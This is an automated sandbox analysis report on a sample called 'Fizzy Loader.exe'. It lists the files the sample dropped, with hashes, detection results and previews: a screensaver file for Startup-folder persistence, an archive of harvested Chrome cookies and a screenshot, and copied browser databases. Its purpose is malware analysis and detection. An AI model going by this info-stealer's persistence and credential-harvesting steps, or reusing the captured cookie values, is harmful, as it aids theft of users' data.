                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: ditekSHen
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.............~.... ........@.. ....................................`.................................(...S.......P............................................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................`.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr:Zone.Identifier

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26
                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Fizzy Loader.exe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):1965
                                                                                                                                                          Entropy (8bit):5.377802142292312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                                                          MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                                                          SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                                                          SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                                                          SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e...........................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6q9sUybuLkTYpBG.ligma

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):689108
                                                                                                                                                          Entropy (8bit):7.997921795505862
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:12288:C9WQAbzEZxsQtYDGj/yXRH5cJ/SmzmKPkzscO+GGwySal9gRjbwHbkXEBuJ9:C92bzexsQyGCcJ/SYmKlcSdySq9u4I9
                                                                                                                                                          MD5:524A9B8398F470C54145EB5C59D0361B
                                                                                                                                                          SHA1:4B3CB65997E121B872BB3443E650DC28C7D72550
                                                                                                                                                          SHA-256:E7D1E40C174C64EE3A9212C14C459F38A3C9A6BCEDA79BCD09270905D93E3016
                                                                                                                                                          SHA-512:47A2A618953E975823ADE85FCBCF064CA5ABE4B21A1B8ADF5AD38785FAFD311A2D21ABB753697EDA5275E98A6835FAF6003A84DB0809D17288E57D6D4FD94C77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK........M..Y.*C.....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..!.]t.-.4..o`.....2|...w...;.S..o..R.7..........0!...T.S.#]'...q.*R...".b..(..Tg....C...'...[g*C{..}...]N...N]..nR..R;.!]3.H.&)..8..<..U......<.fJ...Q^U?s.q%.%-...4......3...g7..p..>..T....*..{.8JZ..k.e......|m...........PK........M..Y5w.............Display\Display.pngt.{<......L...Q9....+..9eK.$bL.U.*.r.....E&."."..J.!.,.4.L...w............].......l...~....g......^1..$..... ,x...;..5.e)X@Agm,../......6....q...SEo`..............l=.Z....X..~p..aq..6...kA...k..T..ss...o9m..sr.)..=.?.tGZY.Q/....."..........F....>i.o.@..$.An.o..v..GmP.?.......O.....j`.....Q...T......C.e.....%p.w?.k..+o...d..!....(........=2.|..Hy6V..........-.oFi##T.5!..2r(b..I.E.^s...1\.:......*.......Y...........j.Trd.m...........&~rKh.T.9........9...}_...c.-..d...p.Yx3x...<.M.5yT.>...7.w.<..|.....d.;..qm.....S.Hz..~N.P..t...t...I..`.74.}G......=.G..L*.}.....9}.T}.......n..z.t2R..a!r0...............0Jr

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6q9sUybuLkTYpBG\Browsers\Cookies\Chrome Cookies.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):289
                                                                                                                                                          Entropy (8bit):5.76524051718901
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                                                                                                                                          MD5:B11F445211C21DB45D7B779A5C6E2444
                                                                                                                                                          SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                                                                                                                                          SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                                                                                                                                          SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6q9sUybuLkTYpBG\Display\Display.png

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):706275
                                                                                                                                                          Entropy (8bit):7.92694203733703
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:sN5If7hE5vUZevY31R2XSefNY396zj9Z6E5gU/59l0vS38V+IxXPOM:tf7wU31RySeC0zj9jgUxuVDWM
                                                                                                                                                          MD5:235FC0F05C4D9DD834F7BF53F7EFB657
                                                                                                                                                          SHA1:659097888EFEE8E7E1D99776C7C995F4E98A42A4
                                                                                                                                                          SHA-256:8C4E950B998DA9439FAB44016F25239BE3B3FBE4F56F4CE82E65AFFD5FE9598E
                                                                                                                                                          SHA-512:AB465130A3E3FB04AE47FC525A247966E22DCFDCA7995FB4237B6D51827E0C0A3F5083F22EE46C6D30D45CF258F0E35C43D7829B52E9F3349C6E6E9B669B802A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx|..7"S..|_.....:~..q....-.Wl!..........y1.......0|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..|_..z.wG...1S..Na....^{.......:Gc..1.....k,|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......|.|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.|..'.<A.y`n..;.1..{.....E%...%.\].

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\JZ0HaEj6FntZgfK

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40960
                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\WfftaKcf4Djlzm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51200
                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kaczf0p.dpv.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hlhxliy.weh.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4edrxid1.2oa.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4y0clyyr.ucs.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eebrmlay.5so.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3kyws0k.l2t.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtldjqn1.jlr.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzlz0c1m.vdm.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qanj5t4l.ft0.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4m1zsen.rwc.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqnh225s.dfv.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5r3514g.rc0.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\gGBgoDt8Dhg3gzW

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

